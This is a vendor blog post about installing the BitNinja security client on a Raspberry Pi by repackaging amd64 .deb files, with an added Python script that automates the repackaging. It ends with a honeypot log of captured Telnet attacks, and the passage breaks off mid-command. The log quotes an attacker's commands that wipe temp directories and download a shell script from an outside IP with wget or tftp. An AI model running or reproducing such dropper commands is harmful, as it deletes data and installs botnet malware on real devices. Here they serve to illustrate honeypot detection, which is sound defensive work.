Pi-Ninja-Security for RaspberryPi
Nikoletta Szabo


The real geek escaped from one Ninjastic developer of ours lately, and in his free time he decided to try to install BitNinja on his Raspberry Pi 2 Model B. And guess what happened? He was successful! What is more, BitNinja also captured some attacks with its port honeypot module. Now let me describe the installation process and what exactly he found.

So the hardware is a Raspberry Pi 2 Model B, and it runs Linux: Raspbian GNU/Linux 8.


The process:

BitNinja is not available for the ARM architecture, so he was not able to install it from the BitNinja Debian repository. To bypass this, he downloaded the packages directly from the repository:

wget http://apt.bitninja.io/debian/pool/non-free/b/bitninja-dojo/bitninja-dojo_LATEST_VERSION_amd64.deb
wget http://apt.bitninja.io/debian/pool/non-free/b/bitninja/bitninja_LATEST_VERSION_amd64.deb

„bitninja” is the client itself

„bitninja-dojo” is a standalone PHP executable

He started with the „bitninja-dojo” package, as the „bitninja” package’s operation depends on it.

1, Create a directory for it

mkdir bitninja-dojo_armhf

2, Move the downloaded .deb file into the directory

mv bitninja-dojo_LATEST_VERSION_amd64.deb bitninja-dojo_armhf/bitninja-dojo_amd64.deb

3, Open the directory

cd bitninja-dojo_armhf

4, Extract the .deb file (it is an ar archive) with this command:

ar vx bitninja-dojo_amd64.deb

5, Delete the .deb file (it was renamed in step 2)

rm bitninja-dojo_amd64.deb

After extracting, we get 3 files:

debian-binary
data.tar.gz –> contains all the data in the package
control.tar.gz –> contains the dependencies of the package and the step-by-step installation instructions (the maintainer scripts)

6, Create a new directory

mkdir control

7, Move control.tar.gz into the new directory and enter it

mv control.tar.gz control/
cd control

8, Extract it

tar -zxvf control.tar.gz

9, Delete the archive

rm control.tar.gz

10, After this, open the control file for editing:

mcedit control

11, Find the following line and change it
This:

Architecture: amd64

To this:

Architecture: armhf

12, Save it

13, Check the dependencies of the package (in the control file):
Depends: libc6 (>= 2.11), zlib1g (>= 1:1.1.4)

So it depends on two packages: libc6 and zlib1g

As the control file does not define which architecture these dependencies should come from, apt should fetch them from one of the configured repositories during the installation.
Just to make sure it works 100%, he installed them beforehand:

apt-get update
apt-get install libc6 zlib1g

14, Now it is time to compress the content of the control directory again:

tar czf control.tar.gz *

15, Move it up one level and go back to the parent directory:

mv control.tar.gz ../
cd ..

16, Delete the control directory

rm -r control

17, It is time to repackage the 3 files into one .deb file:

ar r bitninja-dojo_armhf.deb debian-binary control.tar.gz data.tar.gz

18, You can install it with this command:

dpkg -i bitninja-dojo_armhf.deb

As a matter of fact, we only had to modify the architecture, nothing else.
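The repackaging of steps 1 to 18, as an added example that is not code from the original post or from BitNinja: a Python script that parses the .deb's ar container, rewrites only the Architecture field inside control.tar.gz and writes a new .deb, keeping file modes so maintainer scripts stay executable. It assumes the control archive is gzip-compressed, as on this page, and the package it builds in make_sample_deb is a constructed stand-in for the real amd64 .deb.

```python
import io, re, tarfile, time
AR_MAGIC = b"!<arch>\n"

def parse_ar(data):
    """Split an ar archive (the outer container of a .deb) into (name, bytes) members."""
    pos, members = len(AR_MAGIC), []
    while pos + 60 <= len(data):  # every member starts with a 60-byte text header
        hdr = data[pos:pos + 60]
        name = hdr[0:16].decode().strip().rstrip("/")  # GNU ar terminates names with '/'
        size = int(hdr[48:58].decode())
        members.append((name, data[pos + 60:pos + 60 + size]))
        pos += 60 + size + (size & 1)  # member bodies are padded to an even length
    return members

def build_ar(members):
    """Write members back in the plain ar format dpkg accepts (uid/gid 0, mode 100644)."""
    out, mtime = bytearray(AR_MAGIC), str(int(time.time()))
    for name, body in members:  # keep the order: debian-binary must stay first
        out += (name.ljust(16) + mtime.ljust(12) + "0".ljust(6) + "0".ljust(6)
                + "100644".ljust(8) + str(len(body)).ljust(10)).encode() + b"`\n"
        out += body + (b"\n" if len(body) & 1 else b"")
    return bytes(out)

def tgz(files):  # gzip'd tar of {name: (bytes, mode)}; modes are kept so maintainer scripts stay executable
    buf = io.BytesIO()
    with tarfile.open(fileobj=buf, mode="w:gz") as t:
        for name, (data, mode) in files.items():
            info = tarfile.TarInfo(name); info.size, info.mode = len(data), mode
            t.addfile(info, io.BytesIO(data))
    return buf.getvalue()

def retarget_deb(deb, new_arch):
    """Return (new_deb, old_arch): same members, only the Architecture field of control changes."""
    rebuilt, old = [], None
    for name, body in parse_ar(deb):
        if name == "control.tar.gz":  # steps 6-17 of the post, done in memory (gzip only, as on the page)
            with tarfile.open(fileobj=io.BytesIO(body), mode="r:gz") as t:
                files = {i.name: (t.extractfile(i).read(), i.mode) for i in t.getmembers() if i.isfile()}
            ctrl = next(n for n in files if n.lstrip("./") == "control")
            text, mode = files[ctrl][0].decode(), files[ctrl][1]
            m = re.search(r"^Architecture: *(\S+)$", text, re.M)
            old, files[ctrl] = m.group(1), ((text[:m.start(1)] + new_arch + text[m.end(1):]).encode(), mode)
            body = tgz(files)
        rebuilt.append((name, body))
    return build_ar(rebuilt), old

def make_sample_deb():  # constructed stand-in for the vendor amd64 .deb, not the real BitNinja package
    control = b"Package: bitninja-dojo\nVersion: 0.0\nArchitecture: amd64\nDepends: libc6, zlib1g\n"
    return build_ar([("debian-binary", b"2.0\n"), ("control.tar.gz", tgz({"./control": (control, 0o644)})),
                     ("data.tar.gz", tgz({"./opt/placeholder": (b"data\n", 0o644)}))])
```

On the real file, call retarget_deb(open("bitninja-dojo_amd64.deb", "rb").read(), "armhf") and write the first return value out as bitninja-dojo_armhf.deb. Like the manual steps, this only changes what the package claims about its architecture, not whether the binaries inside run on ARM.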

With the BitNinja package, you should follow the same steps as for bitninja-dojo.
19, Repeat steps 1 to 12, then check the dependencies of the bitninja package:
Depends: bitninja-dojo (>= 1.6), ipset, daemon, iptables (>= 1.4.7), awk, net-tools, grep, gzip, sed, coreutils, lsb-release

As the BitNinja dojo is already installed, we only need to work with the other dependencies.

As mentioned, the package should pull in its dependencies by itself. Since he was installing them by hand, he was not sure it would work for bitninja, because he ran into a problem with the awk package:

Reading package lists... Done
Building dependency tree
Reading state information... Done
Package awk is a virtual package provided by:
original-awk 2012-12-20-2
mawk 1.3.3-17
gawk 1:4.1.1+dfsg-1
You should explicitly select one to install.

E: Package ‘awk’ has no installation candidate

Instead, he installed gawk.

20, The whole command:

apt-get install ipset daemon iptables gawk net-tools grep gzip sed coreutils lsb-release

21, Follow steps 14 to 18
If you have done everything correctly, BitNinja is now installed on your Raspberry, although for now it will not start yet. The BitNinja client does not use the php package; it runs the PHP code with a standalone binary, bitninja-dojo (/opt/bitninja-dojo/run/bin/bitninja-dojo). He thought it likely that this binary is architecture-dependent.
However, it is easily replaceable, as PHP’s own binary works the same way and is available on the Raspberry.
22, Install php5 with the curl extension

apt-get install php5 php5-curl

23, Replace bitninja-dojo with the php5 executable in the shebang line of the following files:

/opt/bitninja/bitninja
/usr/sbin/bitninja-config
/usr/sbin/bitninjacli

this line:

#! /opt/bitninja-dojo/run/bin/bitninja-dojo -c=/opt/bitninja/etc

to this:

#!/usr/bin/php --php-ini=/opt/bitninja/etc

24, Set the license key:

bitninja-config --set license_key=LICENSE_KEY

25, Start BitNinja:

/etc/init.d/bitninja start

For him, BitNinja runs smoothly on his server. The load is between 1.5 and 2.0.

If you would like to catch some bad guys with your Raspberry Pi, do the following:

Set your Raspberry’s internal IP in the router’s DMZ (demilitarized zone) settings, and you can start hunting. :)


Our developer encountered the following Telnet attacks:

"PORT HIT": "xxx.xx.xxx.xx:46376->192.168.1.93:23",
"MESSAGES": "Array
(
=> sh || bash || shell

=> cd /tmp || cd /var/run || cd /dev/shm || cd /mnt || cd /var;rm -f *;busybox wgethttp://xxx.xx.xxx.xxx/bi.sh || wget http://xxx.xx.xxx.xxx/bi.sh || busybox tftp -r bi2.sh -g xxx.xx.xxx.xxx || tftp -r bi2.sh -g xxx.xx.xxx.xxx || busybox tftp xxx.xx.xxx.xxx
=> cd /tmp || cd /var/run || cd /dev/shm || cd /mnt || cd /var;rm -f *;busybox wgethttp://xxx.xx.xxx.xxx/bi.sh || wget http://xxx.xx.xxx.xxx/bi.sh || busybox tftp -r

